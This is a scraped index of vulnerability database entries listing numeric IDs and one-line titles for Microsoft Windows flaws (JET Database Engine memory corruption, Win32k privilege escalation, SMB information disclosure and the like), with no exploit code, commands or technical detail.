[134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133378] Microsoft Windows 7/8/10/Vista Contact File cross site scripting [133237] Microsoft Windows Admin Center privilege escalation [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131616] Microsoft Windows REG File Message weak authentication [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130819] Microsoft Windows Kernel information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129167] Microsoft Windows VCF File memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [125101] Microsoft Windows Graphics Component memory corruption [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [117331] Microsoft Windows Host Compute Host Compute Service Shim privilege escalation [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114550] Microsoft Windows Kernel information disclosure [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107920] Microsoft Windows up to Vista SP2 Graphics information disclosure [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107731] Microsoft Windows 7 SP1 Shell memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 NetBIOS Data Processing Error [104982] Microsoft Windows up to XP SMBv1 Smbloris denial of service [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft Windows up to Server 2016 Wordpad privilege escalation [103444] Microsoft Windows up to Server 2016 Explorer privilege escalation [103442] Microsoft Windows 10/Server 2016 HoloLens privilege escalation [103441] Microsoft Windows up to Server 2016 Object HTTP.sys information disclosure [103431] Microsoft Windows up to Server 2016 PowerShell privilege escalation [103429] Microsoft Windows up to Server 2016 Kerberos privilege escalation [103420] Microsoft Windows up to Server 2016 Kerberos weak authentication [103417] Microsoft Windows up to Server 2016 Windows Shell 7PK Security Features [102513] Microsoft Windows Server 2003 SP2/XP SP3 OLE olecnv32.dll privilege escalation [102512] Microsoft Windows Server 2003 SP2/XP SP3 rpc privilege escalation [102511] Microsoft Windows Server 2003 SP2/XP SP3 RDP EsteemAudit privilege escalation [102412] Microsoft Windows up to Server 2016 PDF privilege escalation [102401] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI USP10!NextCharInLiga information disclosure [102387] Microsoft Windows up to XP SP3 Search privilege escalation [102386] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [102385] Microsoft Windows up to Server 2016 Font Library memory corruption [102377] Microsoft Windows up to Vista SP2 lnk File privilege escalation [102376] Microsoft Windows up to Server 2016 CAB File Data Processing Error [102375] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102374] Microsoft Windows up to Server 2016 PDF Parser privilege escalation [102373] Microsoft Windows up to Server 2016 Uniscribe Font USP10!MergeLigRecords privilege escalation [101820] Microsoft Windows Vista/7/8.1 NtfsCommonCreate denial of service [101817] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101816] Microsoft Windows up to Server 2016 Malware Protection Engine setCaller memory corruption [101815] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101814] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101813] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [101812] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101811] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101810] Microsoft Windows up to Server 2016 Malware Protection Engine Data Processing Error [101491] Microsoft Windows up to XP SP3/Server 2003 SP2 Remote Desktop Protocol gpkcsp.dll memory corruption [101043] Microsoft Windows up to XP SP3 SMB privilege escalation [101042] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101041] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101040] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101039] Microsoft Windows up to XP SP3 SMB privilege escalation [101038] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101037] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101036] Microsoft Windows up to XP SP3 SMBv1 Server privilege escalation [101035] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101034] Microsoft Windows up to XP SP3 SMBv1 Server information disclosure [101028] Microsoft Windows 10/Server 2016 Hyper-V vSMB privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [101002] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101001] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [101000] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100999] Microsoft Windows up to Server 2016 SMBv1 Server Data Processing Error [100918] Microsoft Windows 8/8.1/10/Server 2012/Server 2016 Malware Protection Service memory corruption [100854] Microsoft Windows Server 2003 SP2 RRAS ERRATICGOPHER memory corruption [99904] Microsoft Windows Server 2003 SP2/XP SP3 SmartCard Authentication EsteemAudit privilege escalation [99696] Microsoft Windows up to Vista SP2 Adobe Type Manager Font Driver ATMFD.dll information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99681] Microsoft Windows up to Server 2016 OLE Integrity-Level Check privilege escalation [99680] Microsoft Windows up to Vista SP2 Win32k privilege escalation [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98561] Microsoft IIS 6.0 on Windows Server 2003 WebDAV ScStoragePathFromUrl Immortal/ExploidingCan memory corruption [98272] Microsoft Windows up to 10/Server 2016 Local Session privilege escalation [98113] Microsoft Windows up to Vista SP2 XML Core Services information disclosure [98112] Microsoft Windows up to Vista SP2 DirectShow information disclosure 